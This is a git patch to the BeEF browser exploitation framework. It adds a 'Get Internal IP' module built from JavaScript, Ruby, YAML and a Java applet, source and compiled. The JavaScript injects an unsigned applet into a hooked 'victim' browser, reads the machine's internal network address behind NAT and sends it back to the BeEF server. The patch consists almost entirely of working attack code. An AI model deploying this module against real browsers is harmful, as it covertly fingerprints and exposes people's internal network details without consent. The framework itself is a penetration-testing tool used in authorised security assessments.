From 217edee831eab5e718ae021a28c8883c696a26dc Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Fri, 20 Apr 2012 13:59:58 +0100 Subject: [PATCH] Added get_internal_ip module (uses an unsigned applet). Fix issue 576 --- modules/host/get_internal_ip/command.js | 42 +++++++++++++++ modules/host/get_internal_ip/config.yaml | 26 ++++++++++ .../get_internal_ip/get_internal_ip.class | Bin 0 -> 1397 bytes .../host/get_internal_ip/get_internal_ip.java | 49 ++++++++++++++++++ modules/host/get_internal_ip/module.rb | 35 +++++++++++++ 5 files changed, 152 insertions(+) create mode 100755 modules/host/get_internal_ip/command.js create mode 100755 modules/host/get_internal_ip/config.yaml create mode 100755 modules/host/get_internal_ip/get_internal_ip.class create mode 100755 modules/host/get_internal_ip/get_internal_ip.java create mode 100755 modules/host/get_internal_ip/module.rb diff --git a/modules/host/get_internal_ip/command.js b/modules/host/get_internal_ip/command.js new file mode 100755 index 000000000..abc000788 --- /dev/null +++ b/modules/host/get_internal_ip/command.js @@ -0,0 +1,42 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + var applet_uri = 'http://'+beef.net.host+ ':' + beef.net.port + '/'; + var output; + beef.dom.attachApplet('get_internal_ip', 'get_internal_ip', 'get_internal_ip' , + applet_uri, null, null); + + function waituntilok() { + try { + output = document.get_internal_ip.ip(); + beef.net.send('<%= @command_url %>', <%= @command_id %>, output); + beef.dom.detachApplet('get_internal_ip'); + return; + } catch (e) { + internal_counter++; + if (internal_counter > timeout) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Timeout after '+timeout+' seconds'); + beef.dom.detachApplet('get_internal_ip'); + return; + } + setTimeout(function() {waituntilok()},1000); + } + } + + setTimeout(function() {waituntilok()},5000); + +}); diff --git a/modules/host/get_internal_ip/config.yaml b/modules/host/get_internal_ip/config.yaml new file mode 100755 index 000000000..68a4d63c3 --- /dev/null +++ b/modules/host/get_internal_ip/config.yaml @@ -0,0 +1,26 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + get_internal_ip: + enable: true + category: "Host" + name: "Get Internal IP" + description: "Retrieve the internal (behind NAT) IP address of the victim machine using an unsigned Java applet" + authors: ["antisnatchor"] + target: + working: ["IE", "FF", "O"] + user_notify: ["C", "S"] diff --git a/modules/host/get_internal_ip/get_internal_ip.class b/modules/host/get_internal_ip/get_internal_ip.class new file mode 100755 index 0000000000000000000000000000000000000000..ee31c505bf9f6010277299d89476881871a38585 GIT binary patch literal 1397 zcmZux+fvg|6kVrHni7K4(u#<8QQL~3D5&6#LcwA$*eZ^`IH6=Zfs)iV_3|nD;-jxR zqh&^C9H0Ft$92*Q6`5()-pN_}wsz8AzrXzeFoh>NhH*KJi9Q^`q=YLHuIhv-9oKMO z!nB4N9eubV;iisTmp6kYZQHTEySz;#*94RWcf%4G%-N1rXl<`sjmPGC zjZc*P+w7`9Jn=kvQ09TMXI8fIX5FW2SYlIblwC4ZR$yB;i^dWMhO14_Y>=au-BzPw zE!nbUtZI2L{&xJru20B`3>?P^0j=e1Iqqx6z)_4CI3{6K!ZIFc$QoEd(!fJ-!a-jM z$MPo2Ze`2zWQM$f0*V?|4Lm}UoT=&QiJr?q31xxN9u2KZt6_U@GjA$Z-LqXspl_*I zN@o`rGX;U6J!TI>&6G;Tl7YvvMr4oDS%`ttIK$fe#^mmNrdhAo*z~+_{s}LxZ(0?q zB_kKzN^9G4ytLV*WRbt}%5k5Ra@@J$C+pr*IL171n~av;sw-9J>azkz68|qYE8huO zCg)bn+Wf{w!)i7Kj`o(xGI#fcXzM25wc#k%o=mWd&_nvn@c_y=8-kE;2Js~C<`AF<45xM=QqjOy1btL|R6p}b;1n?m zg{Twzi3TDVU?}&}NhAV136b$K8px;G2(_UVBC9h>#}5ZS!05U&%6IfVyBt?`ptsTA zhB2#-sL_Eo4!uWcM9qIhWLAwvXv4J8{OCK3>GAX!d_rGDXgAK1$Pjqu6tVQYz!FVAJ%zt5=eG5 x^kZd=n)-s^CpsPJ<;FmoU|$DOmHpIlQd7H~$fe5!Vy}Tt#w&b$i3b6U{{f5w2qypl literal 0 HcmV?d00001 diff --git a/modules/host/get_internal_ip/get_internal_ip.java b/modules/host/get_internal_ip/get_internal_ip.java new file mode 100755 index 000000000..2882d1de1 --- /dev/null +++ b/modules/host/get_internal_ip/get_internal_ip.java @@ -0,0 +1,49 @@ +import java.applet.Applet; +import java.applet.AppletContext; +import java.net.InetAddress; +import java.net.Socket; + +/* to compiled it in MacOSX SnowLeopard/Lion: +* javac -cp /System/Library/Frameworks/JavaVM.framework/Resources/Deploy.bundle/Contents/Resources/Java/plugin.jar get_internal_ip.java +* author: antisnatchor (adapted from Lars Kindermann applet) +*/ +public class get_internal_ip extends Applet { + String Ip = "unknown"; + String internalIp = "unknown"; + String IpL = "unknown"; + + private String MyIP(boolean paramBoolean) { + Object obj = "unknown"; + String str2 = getDocumentBase().getHost(); + int i = 80; + if (getDocumentBase().getPort() != -1) i = getDocumentBase().getPort(); + try { + String str1 = new Socket(str2, i).getLocalAddress().getHostAddress(); + if (!str1.equals("255.255.255.255")) obj = str1; + } catch (SecurityException localSecurityException) { + obj = "FORBIDDEN"; + } catch (Exception localException1) { + obj = "ERROR"; + } + if (paramBoolean) try { + obj = new Socket(str2, i).getLocalAddress().getHostName(); + } catch (Exception localException2) { + } + return (String) obj; + } + + public void init() { + this.Ip = MyIP(false); + } + + public String ip() { + return this.Ip; + } + + public String internalIp() { + return this.internalIp; + } + + public void start() { + } +} \ No newline at end of file diff --git a/modules/host/get_internal_ip/module.rb b/modules/host/get_internal_ip/module.rb new file mode 100755 index 000000000..cb950806a --- /dev/null +++ b/modules/host/get_internal_ip/module.rb @@ -0,0 +1,35 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Get_internal_ip < BeEF::Core::Command + + def pre_send + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_internal_ip/get_internal_ip.class', '/get_internal_ip', 'class') + end + + #def self.options + # return [ + # { 'name' => 'applet_name', 'description' => 'Applet Name', 'ui_label'=>'Number', 'value' =>'5551234','width' => '200px' }, + # ] + #end + + def post_execute + content = {} + content['Result'] = @datastore['result'] + save content + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/get_internal_ip.class') + end + +end